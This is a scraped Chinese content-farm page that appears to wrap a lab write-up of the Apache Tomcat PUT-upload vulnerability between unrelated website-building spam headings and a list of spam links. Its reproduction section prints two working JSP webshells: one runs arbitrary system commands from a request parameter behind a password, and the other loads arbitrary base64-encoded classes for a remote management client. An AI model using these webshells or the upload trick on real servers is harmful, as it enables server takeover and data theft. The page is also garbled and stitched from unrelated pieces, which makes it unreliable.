当前位置: 首页 > news >正文

如何做网站 代码做电影网站 需要进那些群

如何做网站 代码,做电影网站 需要进那些群,做包装设计的网站有哪些,室内设计效果图制作软件1.1、漏洞原理 描述: Tomcat 是一个小型的轻量级应用服务器#xff0c;在中小型系统和并发访问用户不是很多的场合下被普遍使用#xff0c;是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件#x…1.1、漏洞原理 描述: Tomcat 是一个小型的轻量级应用服务器在中小型系统和并发访问用户不是很多的场合下被普遍使用是开发和调试JSP 程序的首选。 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件JSP文件中的恶意代码将能被服务器执行导致服务器上的数据泄露或获取服务器权限。 Tomcat 的 Servlet 是在 conf/web.xml 配置的通过配置文件可知当后缀名为 .jsp 和 .jspx 的时候是通过 JspServlet 处理请求的 而其他的静态文件是通过 DefaultServlet 处理的 可以得知“1.jsp ”末尾有一个空格并不能匹配到 JspServlet而是会交由 DefaultServlet 去处理。当处理 PUT 请求时 会调用 resources.bind dirContext 为 FileDirContext 调用 rebind 创建文件 又由于Windows 不允许“ ”作为文件名结尾所以会创建一个 .jsp 文件导致代码执行。 漏洞本质Tomcat配置了可写readonlyfalse导致我们可以往服务器写文件 servletservlet-namedefaultservlet-nameservlet-classorg.apache.catalina.servlets.DefaultServletservlet-classinit-paramparam-namedebugparam-nameparam-value0param-valueinit-paraminit-paramparam-namelistingsparam-nameparam-valuefalseparam-valueinit-paraminit-paramparam-namereadonlyparam-nameparam-valuefalseparam-valueinit-paramload-on-startup1load-on-startupservlet 1.2、影响范围不重要去试就行 Apache Tomcat 7.0.0 - 8.0.81  1.3、 漏洞指纹 tomcat 8009 ajp \x04\x01\xf4\x00\x15 1.4、漏洞复现 如下是回显jsp马 % if(023.equals(request.getParameter(pwd))){ java.io.InputStream in Runtime.getRuntime().exec(request.getParameter(i)).getInputStream(); int a -1; byte[] b new byte[2048]; out.print( );while((ain.read(b))!-1){ out.println(new String(b)); } out.print( ); } % 如下是连接的jsp一句话木马,密码是passwd %!class U extends ClassLoader {U(ClassLoader c) {super(c);}public Class g(byte[] b) {return super.defineClass(b, 0, b.length);}}public byte[] base64Decode(String str) throws Exception {try {Class clazz Class.forName(sun.misc.BASE64Decoder);return (byte[]) clazz.getMethod(decodeBuffer, String.class).invoke(clazz.newInstance(), str);} catch (Exception e) {Class clazz Class.forName(java.util.Base64);Object decoder clazz.getMethod(getDecoder).invoke(null);return (byte[]) decoder.getClass().getMethod(decode, String.class).invoke(decoder, str);}} % %String cls request.getParameter(passwd);if (cls ! null) {new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);} % flag-{bmhbf13076b-9643-4a67-a3c1-550825a9f6ba}
http://www.huolong8.cn/news/141535/

相关文章:

  • 全球十大建筑设计公司嘉兴网站快照优化公司
  • 个人网站做重定向图片wordpress视频文件大小设置
  • 嘉兴微网站建设wordpress建站小百科
  • 合肥企业建站系统商城网站开发的完整流程
  • 视频网站主持人贵州企业网站
  • 国外网站导航网站搭建谷歌seo
  • 百度网站推广怎么样广点通投放平台登录
  • 宁波专业网站推广平台咨询环球资源网成立时间
  • 中怎么做网站上下载图片的功能南昌外包建站
  • 制作商城网站西安官网seo收费
  • 巩义专业网站建设公司推荐.net开发的网站有哪些
  • 网站模板文件扫描win10部署wordpress
  • 网站关键词 查询制作网页需要用到哪些工具
  • 梅江区建设局网站做婚礼请柬的网站有哪些
  • 昆明做网站那家好古典网站建设
  • 会声会影模板免费网站seo技术分类
  • 专门做招商的网站是什么意思广州设计公司网站
  • 能绑定域名的免费网站安徽合肥做网站的公司有哪些
  • 学生做网站期末作业wordpress适合百度
  • WordPress建影视站十大网络营销经典案例
  • 网站建设视频教程网字节跳动现有员工人数
  • 计算机科学与技术 开题报告 网站建设医疗器械网上采购平台
  • 潍坊网站建设小程序php开发做网站
  • vs210做网站国内创意网页设计
  • 电话号码宣传广告汕头百度seo电话
  • 常州自助做网站wordpress建站博客
  • 移动网站的设计报告织梦的手机端网站模板下载地址
  • flask做视频网站广州百度seo
  • 百度做的网站 如果不做推广了 网站还保留吗国外flash网站模板
  • 网站空间换了 使用原有域名软文广告经典案例分析